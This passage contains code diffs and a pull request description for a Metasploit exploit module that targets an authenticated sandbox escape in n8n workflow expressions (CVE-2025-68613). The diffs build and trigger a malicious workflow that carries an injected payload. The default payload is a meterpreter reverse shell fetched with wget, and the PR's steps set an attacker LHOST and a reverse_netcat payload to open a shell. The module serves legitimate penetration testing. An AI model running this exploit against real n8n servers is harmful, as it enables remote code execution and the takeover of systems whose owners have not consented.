+      "Schedule Trigger"=> {
+        "main"=> [
+          [
+            {
+              "node"=> "Set",
+              "type"=> "main",
+              "index"=> 0
+            }
+          ]
+        ]
+      }
+    },
+        "active"=> false,
+    "settings"=> {
+      "saveDataErrorExecution"=> "all",
+      "saveDataSuccessExecution"=> "all",
+      "saveManualExecutions"=> true,
+      "executionOrder"=> "v1"
+    },
+    "tags"=> [],
+    "versionId" => version_id,
+    "meta" => "null",
+    "id" => id
+        },
+          "startNodes"=> [],
+  "destinationNode"=> "Set"
+    }
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', workflow_id.to_s,'run'),
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'data' => activation_data.to_json
+    )
 
     print_good("Created workflow with ID: #{workflow_id}")
     @workflow_id = workflow_id
@@ -276,6 +326,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_workflow(workflow_id)
     print_status("Activating workflow #{workflow_id} to trigger scheduled execution...")
+
 
     res = send_request_cgi(
       'method' => 'PATCH',

--- a/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
+++ b/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
@@ -52,6 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
               'DefaultOptions' => {
+                # cmd/unix payloads use commands that might not be present in docker instance
                 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
                 'FETCH_COMMAND' => 'wget'
               }
@@ -97,6 +98,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    return CheckCode::Unknown('Could not authenticate to n8n') unless authenticate
+
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'rest', 'settings')
@@ -106,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Detected('Connected to n8n, received unexpected response') unless res.code == 200
 
     json = res.get_json_document
-    version = Rex::Version.new(json['versionCli'])
+    version = Rex::Version.new(json.dig('data', 'versionCli'))
 
     return CheckCode::Detected('n8n detected but could not determine version') unless version
 
@@ -294,7 +297,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    authenticate
+    cookie_jar.clear
+
+    fail_with(Failure::NoAccess, 'Could not authenticate') unless authenticate
 
     create_malicious_workflow(payload.encoded)
   end

--- a/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
+++ b/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
@@ -133,20 +133,12 @@ class MetasploitModule < Msf::Exploit::Remote
         'password' => datastore['PASSWORD']
       }.to_json
     )
-    return true if res&.code == 200
-
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'rest', 'login'),
-      'ctype' => 'application/json',
-      'keep_cookies' => true,
-      'data' => {
-        'email' => datastore['USERNAME'],
-        'password' => datastore['PASSWORD']
-      }.to_json
-    )
 
     return true if res&.code == 200
+
+    json_data = res.get_json_document
+
+    print_error("Login failed: #{json_data['message']}")
 
     false
   end
@@ -226,9 +218,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => workflow_data.to_json
     )
 
-    unless res&.code == 200 || res&.code == 201
-      fail_with(Failure::UnexpectedReply, "Failed to create workflow: #{res&.code}")
-    end
+    fail_with(Failure::UnexpectedReply, "Failed to create workflow: #{res&.code}") unless res&.code == 200 || res&.code == 201
 
     json = res.get_json_document
 
@@ -237,9 +227,7 @@ class MetasploitModule < Msf::Exploit::Remote
     version_id = json.dig('data', 'versionId')
     id = json.dig('data', 'id')
 
-    unless @workflow_id
-      fail_with(Failure::UnexpectedReply, 'Failed to get workflow ID from response')
-    end
+    fail_with(Failure::UnexpectedReply, 'Failed to get workflow ID from response') unless @workflow_id && nodes && version_id && id
 
     activation_data = {
       'workflowData' => {
@@ -275,7 +263,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'destinationNode' => 'Edit Fields'
     }
 
-    send_request_cgi(
+    print_status('Triggering malicious workflow...')
+
+    res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s, 'run'),
       'ctype' => 'application/json',
@@ -283,15 +273,17 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => activation_data.to_json
     )
 
+    fail_with(Failure::PayloadFailed, 'Could not start workflow') unless res&.code == 200
+
     print_good("Created workflow with ID: #{@workflow_id}")
   end
 
-  def delete_workflow
+  def archive_workflow
     print_status("Cleaning up workflow #{@workflow_id}...")
 
     send_request_cgi(
-      'method' => 'DELETE',
-      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s),
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s, 'archive'),
       'keep_cookies' => true
     )
   end
@@ -306,23 +298,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def cleanup
     super
-    return unless @workflow_id
-
-    begin
+    if @workflow_id
+      archive_workflow
+      # delete workflow
       send_request_cgi(
-        'method' => 'PATCH',
-        'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s),
-        'ctype' => 'application/json',
-        'keep_cookies' => true,
-        'data' => { 'active' => false }.to_json
+        'method' => 'DELETE',
+        'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s)
       )
-
-      delete_workflow
-      print_good('Workflow cleaned up successfully')
-    rescue StandardError => e
-      print_warning("Failed to clean up workflow: #{e.message}")
     end
-
-    @workflow_id = nil
   end
 end

--- a/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
+++ b/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
@@ -105,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'rest', 'settings')
     )
 
-    return CheckCode::Unknown('Could not connect to n8n') unless res
+    return CheckCode::Unknown('Could not connect to n8n') if res.blank?
     return CheckCode::Detected('Connected to n8n, received unexpected response') unless res.code == 200
 
     json = res.get_json_document
@@ -130,6 +130,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true,
       'data' => {
         'emailOrLdapLoginId' => datastore['USERNAME'],
+        'email' => datastore['USERNAME'],
         'password' => datastore['PASSWORD']
       }.to_json
     )
@@ -171,37 +172,35 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         {
           parameters: {
-            assignments: {
-              assignments: [
+            values: {
+              string: [
                 {
-                  'id' => Rex::Text.rand_text_alphanumeric(36),
-                  name: 'test',
-                  value: "=#{expression_payload}",
-                  type: 'string'
+                  value: "=#{expression_payload}"
                 }
               ]
             },
             options: {}
           },
+          id: '40031677-e085-4434-9168-fb0b21ead60d',
+          name: 'Set',
           type: 'n8n-nodes-base.set',
-          typeVersion: 3.4,
+          typeVersion: 1,
           position: [
-            208,
+            220,
             0
-          ],
-          'id' => Rex::Text.rand_text_alphanumeric(36),
-          name: 'Edit Fields'
-        },
+          ]
+        }
       ],
       'connections' => {
         "When clicking 'Execute workflow'" => {
           'main' => [
             [
               {
-                'node' => 'Edit Fields',
+                'node' => 'Set',
                 'type' => 'main',
                 'index' => 0
               }
+
             ]
           ]
         }
@@ -239,7 +238,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'main' => [
               [
                 {
-                  'node' => 'Edit Fields',
+                  'node' => 'Set',
                   'type' => 'main',
                   'index' => 0
                 }
@@ -260,18 +259,28 @@ class MetasploitModule < Msf::Exploit::Remote
         'id' => id
       },
       'startNodes' => [],
-      'destinationNode' => 'Edit Fields'
+      'destinationNode' => 'Set'
     }
 
     print_status('Triggering malicious workflow...')
 
     res = send_request_cgi(
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s, 'run'),
+      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', 'run'),
       'ctype' => 'application/json',
       'keep_cookies' => true,
       'data' => activation_data.to_json
     )
+
+    if res&.code == 404
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s, 'run'),
+        'ctype' => 'application/json',
+        'keep_cookies' => true,
+        'data' => activation_data.to_json
+      )
+    end
 
     fail_with(Failure::PayloadFailed, 'Could not start workflow') unless res&.code == 200
 

--- a/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
+++ b/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
@@ -264,6 +264,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status('Triggering malicious workflow...')
 
+    # older versions on n8n allow to execute workflow without workflow ID, while the newer versions
+    # have URI rest/workflow/[workflow ID]/run available to make workflow run. If the first request
+    # returns 404, it means that it is probably newer version, so module will try the second variant.
+
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', 'run'),


### PR DESCRIPTION
Fixes https://github.com/rapid7/metasploit-framework/issues/20809

## Add n8n Workflow Expression RCE (CVE-2025-68613)

This PR adds a new exploit module for CVE-2025-68613, an authenticated Remote Code Execution vulnerability in n8n versions >= 0.211.0 and < 1.120.4.

### What does this change do?

Adds `exploit/linux/http/n8n_workflow_expression_rce` which exploits a sandbox escape in the workflow expression evaluation engine. By injecting specific JavaScript payloads into a `Schedule Trigger` workflow, authenticated users can execute arbitrary system commands.

**Vulnerable Versions Tested**: 1.100.0, 1.110.0, 1.119.0

### Files Added
- `modules/exploits/multi/http/n8n_workflow_expression_rce.rb`
- `documentation/modules/exploit/multi/http/n8n_workflow_expression_rce.md`

### Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/n8n_workflow_expression_rce`
- [ ] `set RHOSTS <target_ip>`
- [ ] `set RPORT 5678`
- [ ] `set USERNAME <user>`
- [ ] `set PASSWORD <pass>`
- [ ] `set LHOST <attacker_ip>`
- [ ] `set PAYLOAD cmd/unix/reverse_netcat`
- [ ] `check`
- [ ] **Verify** target is detected as vulnerable
- [ ] `run`
- [ ] **Verify** shell session opens
- [ ] **Verify** process execution (e.g., `id`)

### References
- CVE-2025-68613
- https://nvd.nist.gov/vuln/detail/CVE-2025-68613
